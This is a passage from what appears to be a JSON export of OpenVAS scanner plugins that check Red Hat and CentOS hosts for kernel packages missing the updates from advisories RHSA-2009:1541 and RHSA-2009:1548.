exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-27T10:56:12", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:1541.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-11-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66175", "id": "OPENVAS:66175", "title": "RedHat Security Advisory RHSA-2009:1541", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1541.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1541 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:1541.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* a NULL pointer dereference flaw was found in each of the following\nfunctions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\npipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\nbe released by other processes before it is used to update the pipe's\nreader and writer counters. This could lead to a local denial of service or\nprivilege escalation. (CVE-2009-3547, Important)\n\nUsers should upgrade to these updated packages, which contain a backported\npatch to correct these issues. The system must be rebooted for this update\nto take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66175);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-3547\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1541\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1541.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#important\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-largesmp\", rpm:\"kernel-largesmp~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-largesmp-devel\", rpm:\"kernel-largesmp-devel~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~89.0.16.EL\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:55:44", "bulletinFamily": "scanner", "description": "Check for the Version of kernel", "modified": "2017-07-10T00:00:00", "published": "2011-08-09T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880808", "id": "OPENVAS:880808", "title": "CentOS Update for kernel CESA-2009:1541 centos4 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2009:1541 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The kernel packages contain the Linux kernel, the core of any Linux\n operating system.\n\n This update fixes the following security issues:\n \n * a NULL pointer dereference flaw was found in each of the following\n functions in the Linux kernel: pipe_read_open(), pipe_write_open(), and\n pipe_rdwr_open(). When the mutex lock is not held, the i_pipe pointer could\n be released by other processes before it is used to update the pipe's\n reader and writer counters. This could lead to a local denial of service or\n privilege escalation. (CVE-2009-3547, Important)\n \n Users should upgrade to these updated packages, which contain a backported\n patch to correct these issues. The system must be rebooted for this update\n to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"kernel on CentOS 4\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2009-November/016302.html\");\n script_id(880808);\n script_version(\"$Revision: 6653 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 13:46:53 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-08-09 08:20:34 +0200 (Tue, 09 Aug 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2009:1541\");\n script_cve_id(\"CVE-2009-3547\");\n script_name(\"CentOS Update for kernel CESA-2009:1541 centos4 i386\");\n\n script_summary(\"Check for the Version of kernel\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem\", rpm:\"kernel-hugemem~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-hugemem-devel\", rpm:\"kernel-hugemem-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp\", rpm:\"kernel-smp~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-smp-devel\", rpm:\"kernel-smp-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU\", rpm:\"kernel-xenU~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-xenU-devel\", rpm:\"kernel-xenU-devel~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.9~89.0.16.EL\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:40:41", "bulletinFamily": "scanner", "description": "The remote host is missing updates to the kernel announced in\nadvisory RHSA-2009:1548.\n\nFor details on the issues addressed in this update, please visit\nthe referenced security advisories.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066176", "id": "OPENVAS:136141256231066176", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:1548", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1548.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1548 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to the kernel announced in\nadvisory RHSA-2009:1548.\n\nFor details on the issues addressed in this update, please visit\nthe referenced security advisories.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66176\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-2695\", \"CVE-2009-2908\", \"CVE-2009-3228\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3613\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1548\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1548.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#important\");\n script_xref(name : \"URL\" , value : \"http://kbase.redhat.com/faq/docs/DOC-18042\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debuginfo\", rpm:\"kernel-kdump-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-devel\", rpm:\"kernel-kdump-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:56:50", "bulletinFamily": "scanner", "description": "The remote host is missing updates to the kernel announced in\nadvisory RHSA-2009:1548.\n\nFor details on the issues addressed in this update, please visit\nthe referenced security advisories.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-11-11T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66176", "id": "OPENVAS:66176", "title": "RedHat Security Advisory RHSA-2009:1548", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_1548.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:1548 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to the kernel announced in\nadvisory RHSA-2009:1548.\n\nFor details on the issues addressed in this update, please visit\nthe referenced security advisories.\n\nUsers should upgrade to these updated packages, which contain backported\npatches to correct these issues. The system must be rebooted for this\nupdate to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(66176);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-2695\", \"CVE-2009-2908\", \"CVE-2009-3228\", \"CVE-2009-3286\", \"CVE-2009-3547\", \"CVE-2009-3613\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:1548\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-1548.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#important\");\n script_xref(name : \"URL\" , value : \"http://kbase.redhat.com/faq/docs/DOC-18042\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"kernel\", rpm:\"kernel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE\", rpm:\"kernel-PAE~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-debuginfo\", rpm:\"kernel-PAE-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-PAE-devel\", rpm:\"kernel-PAE-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo\", rpm:\"kernel-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-debuginfo-common\", rpm:\"kernel-debuginfo-common~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-devel\", rpm:\"kernel-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-headers\", rpm:\"kernel-headers~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen\", rpm:\"kernel-xen~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-debuginfo\", rpm:\"kernel-xen-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-xen-devel\", rpm:\"kernel-xen-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-doc\", rpm:\"kernel-doc~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump\", rpm:\"kernel-kdump~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-debuginfo\", rpm:\"kernel-kdump-debuginfo~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"kernel-kdump-devel\", rpm:\"kernel-kdump-devel~2.6.18~164.6.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:39:58", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-08-09T00:00:00", "id": "OPENVAS:1361412562310880731", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880731", "title": "CentOS Update for kernel CESA-2009:1548 centos5 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for kernel CESA-2009:1548 centos5 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2009-November/016304.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880731\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 